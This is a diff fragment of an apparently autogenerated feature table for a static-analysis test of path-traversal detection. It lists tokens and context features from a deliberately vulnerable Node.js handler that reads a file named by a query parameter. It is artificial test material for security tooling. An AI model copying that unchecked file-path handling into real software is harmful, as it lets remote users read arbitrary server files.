autogenerated/TaintedPath/tainted-array-steps.js:9:28:9:30 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:28:9:30 | url | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | calleeImports | url | @@ -10736,6 +84728,56 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:9:33:9:36 | true | receiverName | url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:39:9:43 | query | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:39:9:43 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:39:9:43 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:39:9:43 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:39:9:43 | query | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:9:45:9:48 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:9:45:9:48 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:9:45:9:48 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:9:45:9:48 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:9:45:9:48 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:5 | res | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:5 | res | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:11 | res.write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:11 | res.write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | exceptional return of res.wri ... ('/'))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | exceptional return of res.wri ... ('/'))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | exceptional return of res.wri ... ('/'))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | exceptional return of res.wri ... ('/'))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | exceptional return of res.wri ... ('/'))) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | res.wri ... ('/'))) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | res.wri ... ('/'))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | res.wri ... ('/'))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | res.wri ... ('/'))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:3:10:56 | res.wri ... ('/'))) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:7:10:11 | write | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:7:10:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:7:10:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:7:10:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:7:10:11 | write | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:14 | fs | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:14 | fs | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:27 | fs.readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:27 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | exceptional return of fs.read ... n('/')) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | exceptional return of fs.read ... n('/')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | exceptional return of fs.read ... n('/')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | exceptional return of fs.read ... n('/')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | exceptional return of fs.read ... n('/')) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | contextFunctionInterfaces | | @@ -10744,6 +84786,21 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:10:13:10:55 | fs.read ... n('/')) | receiverName | res | +| autogenerated/TaintedPath/tainted-array-steps.js:10:16:10:27 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:16:10:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:16:10:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:16:10:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:16:10:27 | readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:44 | ['public', path] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:44 | ['public', path] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:44 | ['public', path] | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:44 | ['public', path] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:44 | ['public', path] | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:49 | ['publi ... h].join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:49 | ['publi ... h].join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:49 | ['publi ... h].join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:49 | ['publi ... h].join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:49 | ['publi ... h].join | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | calleeImports | fs | @@ -10753,6 +84810,36 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | ['publi ... in('/') | receiverName | fs | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | exceptional return of ['publi ... in('/') | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | exceptional return of ['publi ... in('/') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | exceptional return of ['publi ... in('/') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | exceptional return of ['publi ... in('/') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:29:10:54 | exceptional return of ['publi ... in('/') | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:30:10:37 | 'public' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:40:10:43 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:10:46:10:49 | join | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:10:46:10:49 | join | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:10:46:10:49 | join | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:10:46:10:49 | join | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:10:46:10:49 | join | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | CalleeFlexibleAccessPath | ?.join | | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | contextFunctionInterfaces | | @@ -10760,6 +84847,111 @@ tokenFeatures | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/tainted-array-steps.js:10:51:10:53 | '/' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:11 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:11 | parts | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:11 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:11 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:11 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts = ... , path] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts = ... , path] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts = ... , path] | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts = ... , path] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:7:12:30 | parts = ... , path] | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:15:12:30 | ['public', path] | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:15:12:30 | ['public', path] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:12:15:12:30 | ['public', path] | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:15:12:30 | ['public', path] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:15:12:30 | ['public', path] | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:16:12:23 | 'public' | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:12:26:12:29 | path | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:7 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:7 | parts | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:7 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:7 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:7 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts = ... Case()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts = ... Case()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts = ... Case()) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts = ... Case()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:3:13:41 | parts = ... Case()) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:15 | parts | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:15 | parts | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:15 | parts | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:15 | parts | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:15 | parts | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:19 | parts.map | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:19 | parts.map | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:19 | parts.map | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:19 | parts.map | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:19 | parts.map | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | exceptional return of parts.m ... Case()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | exceptional return of parts.m ... Case()) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | exceptional return of parts.m ... Case()) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | exceptional return of parts.m ... Case()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | exceptional return of parts.m ... Case()) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | parts.m ... Case()) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | parts.m ... Case()) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | parts.m ... Case()) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | parts.m ... Case()) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:11:13:41 | parts.m ... Case()) | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:17:13:19 | map | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:17:13:19 | map | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:17:13:19 | map | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:17:13:19 | map | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:17:13:19 | map | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | contextSurroundingFunctionParameters | (req, res)\n(x) | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:21 | x | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | 'arguments' object of anonymous function | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/tainted-array-steps.js:13:21:13:40 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync public path join / parts public path parts parts map x x toLowerCase res write fs readFileSync parts join / | +| 